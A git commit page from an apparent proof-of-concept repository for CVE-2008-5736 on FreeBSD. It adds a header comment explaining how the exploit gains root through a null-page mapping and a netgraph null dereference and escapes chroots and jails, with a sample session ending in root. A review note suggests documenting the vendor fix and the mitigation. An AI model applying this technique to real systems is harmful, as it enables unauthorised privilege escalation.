authorJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 20:52:59 -0500
committerJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 20:52:59 -0500
commit19e04e2be9f96d27160bbccc9da952828bf161af (patch)
treec65bbeda9948beadd24efc16155d51bafed35d75
parentPrint to stdout, not stderr. (diff)
downloadCVE-2008-5736-19e04e2be9f96d27160bbccc9da952828bf161af.tar.xz
CVE-2008-5736-19e04e2be9f96d27160bbccc9da952828bf161af.zip
Add l33t comment.
-rw-r--r--current-thread-exec.c38
1 files changed, 38 insertions, 0 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c
index 7661fb3..53fa5ee 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -1,3 +1,41 @@
+/*
+ * This is an exploit for CVE-2008-5736, the FreeBSD protosw
+ * and loosely based on Don Bailey's 2008 exploit -
+ * http://www.exploit-db.com/exploits/7581/ . The thing with
+ * Don's exploit is that it relies on having a known location
+ * of allproc, which means having access to the kernel or
+ * debugging symbols, either of which might not be available.
+ * Initial attempts included a general memory search for some
+ * characteristics of allproc, but this was difficult to make
+ * reliable. This solution here is a much more standard - get
+ * the current thread, change its permissions, and execl to
+ * shell. Additionally, it breaks out of chroots and freebsd
+ * jails by reparenting to pid 1 and copying its fds.
+ *
+ * This reliably works on kernels on or below 6.4-RELEASE:
+ *
+ * $ gcc a.c
+ * $ ./a.out
+ * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~
+ * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~
+ * ~~~~~ greetz to don bailey, edemveiss ~~~~~
+ *
+ * [+] mmapping null page
+ * [+] adding jmp to pwnage in null page
+ * [+] opening netgraph socket
+ * [+] triggering null dereference
+ * [+] elevating permissions
+ * [+] got root!
+ * #
+ *
+ * It's an oldie, but simple enough that someone needed
+ * to write another PoC exploit at some point.
+ *
+ * cheers,
+ * zx2c4, 27-2-2011
+ *
+ */
+
#define _KERNEL
#include <sys/types.h>
#include <sys/time.h>
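Review bot: The new header comment gives the affected range only as "kernels on or below 6.4-RELEASE" (the line before the sample session) and never names the vendor fix, so a reader cannot tell whether a 6.4 system at a later patch level is inside or outside that range. Add a reference line next to it such as `* Fixed by: [vendor advisory for CVE-2008-5736]; a patched 6.4 (-pN) is not affected` so the version claim is checkable against the advisory rather than taken on trust. The session transcript in the comment also shows the first step is "mmapping null page", so it would help to say that the stated ceiling depends on the kernel still allowing a mapping at address zero — later releases refuse this by default via the `security.bsd.map_at_zero` sysctl (exact release to be confirmed), which is the relevant mitigation for anyone assessing exposure. The hunk is comment-only; the code it documents starts at the trailing `#define _KERNEL` context and continues outside the hunk.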